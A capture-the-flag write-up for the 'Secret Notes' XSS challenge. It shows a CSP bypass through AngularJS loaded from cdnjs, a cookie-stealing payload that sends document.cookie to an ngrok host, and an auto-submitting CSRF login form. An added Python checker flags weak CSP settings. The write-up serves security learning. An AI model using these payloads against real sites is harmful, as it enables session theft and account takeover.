Secret Notes

Secret Notes was an XSS challenge built around a self-XSS that could be leveraged through CSRF; it was also necessary to bypass CSP.

Approaching the app

The app has two main features. The first is a notepad: you log in and the note is tied to your account, so whenever you log in as the same user you'll see the same note (this may sound obvious, but it's kind of the catch here😉).

It's possible to log in to the notepad using admin as both username and password. Once logged in, we receive a CSP header as follows:

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' cdnjs.cloudflare.com maxcdn.bootstrapcdn.com; style-src maxcdn.bootstrapcdn.com 'self' 'unsafe-inline';

The app won't run simple XSS payloads such as <script>alert()</script>, but the policy accepts any script from cdnjs. That means we could, for example, import angular.js and finally be able to run JavaScript, since AngularJS templates combined with 'unsafe-eval' give us arbitrary code execution. There is a HackTricks article that makes this fairly easy to accomplish.

Running the following payload will pop an alert:

</textarea><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert("csp bypass ez af");//');}} </div>
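From the defender's side, as an added example that is not part of the original writeup: a small Python checker that parses a CSP header and flags the weaknesses this bypass relied on ('unsafe-eval', 'unsafe-inline' without a nonce or hash, and whole public-CDN hosts in script-src). The GADGET_CDNS list and the HARDENED_CSP policy are constructed assumptions for the demo.

```python
# Added defensive example (not from the original writeup): audit a CSP header
# for the weaknesses the Secret Notes bypass relied on. GADGET_CDNS is an
# assumption: public CDNs that host libraries such as angular.js, which is
# why allowing a whole CDN host in script-src is as good as allowing any code.
GADGET_CDNS = {"cdnjs.cloudflare.com", "maxcdn.bootstrapcdn.com", "ajax.googleapis.com"}

# The header the challenge served (copied from the writeup).
SECRET_NOTES_CSP = ("default-src 'self'; script-src 'self' 'unsafe-eval' "
                    "cdnjs.cloudflare.com maxcdn.bootstrapcdn.com; "
                    "style-src maxcdn.bootstrapcdn.com 'self' 'unsafe-inline';")

# A constructed hardened policy: nonce for inline scripts, CDN script pinned
# to a full path instead of the whole host, and no 'unsafe-eval'.
HARDENED_CSP = ("default-src 'self'; script-src 'self' 'nonce-r4nd0mN0nce' "
                "https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js; "
                "object-src 'none'; base-uri 'self'")


def parse_csp(header):
    """Split a CSP header into {directive: [source, ...]}; on duplicates the first wins."""
    policy = {}
    for raw in header.split(";"):
        parts = raw.strip().split()
        if parts and parts[0].lower() not in policy:
            policy[parts[0].lower()] = parts[1:]
    return policy


def script_sources(policy):
    # script-src falls back to default-src; with neither present nothing may load.
    return policy.get("script-src", policy.get("default-src", ["'none'"]))


def audit_csp(header):
    """Return a list of findings explaining how script execution could be gained."""
    sources = script_sources(parse_csp(header))
    findings = []
    if "'unsafe-eval'" in sources:
        findings.append("'unsafe-eval' lets template engines such as AngularJS $eval run attacker strings")
    if "'unsafe-inline'" in sources and not any(s.startswith(("'nonce-", "'sha")) for s in sources):
        findings.append("'unsafe-inline' without a nonce or hash lets injected <script> tags run")
    for src in sources:
        host, _, path = src.split("//", 1)[-1].partition("/")  # drop scheme, split host/path
        if host == "*" or host.startswith("*."):
            findings.append(f"wildcard host {src} allows scripts from arbitrary origins")
        elif host.lower() in GADGET_CDNS and not path:
            findings.append(f"whole host {host} allowed: any hosted library (e.g. angular.js) can load")
    return findings


if __name__ == "__main__":
    for name, csp in (("challenge", SECRET_NOTES_CSP), ("hardened", HARDENED_CSP)):
        print(name, audit_csp(csp) or ["no script-src weaknesses found"])
```

Pinning a CDN script to its full path (or using a nonce) removes the "load any library you like" gadget without giving up the CDN.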

The second feature of the app allows you to submit a URL that the admin will browse to.

The app also doesn't have any CSRF protection at all. With all the info we've gathered, we could send the admin a URL pointing to a CSRF page that submits a login form to the app with the same credentials we used, so the admin gets logged into our account and lands on our self-XSS payload.

The exploit

We could try exfiltrating cookies with a payload like the following:

</textarea><script src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js'></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };location=`http://d3e1fcf03b4e.ngrok.io/?xss=`+btoa(document.cookie);//');}}</div>

We set the location to a server we control and pass the cookies as a GET parameter; this is basic data exfiltration via XSS. After storing the XSS payload in the notepad, we just need to get the admin to log in. This can be done by serving the following HTML form, generated with Burp Suite (Engagement tools > Generate CSRF PoC):

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form id="form1" action="http://34.135.203.251/login" method="POST">
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="password" value="admin" />
    </form>
    <script>
      document.getElementById("form1").submit();
    </script>
  </body>
</html>

Burp Suite generates a PoC that requires user interaction, but it can be modded with JavaScript to submit automatically, as above. After sending the CSRF URL to the admin, a cookie hits our server.

After decoding the base64 data, we get the flag 😛
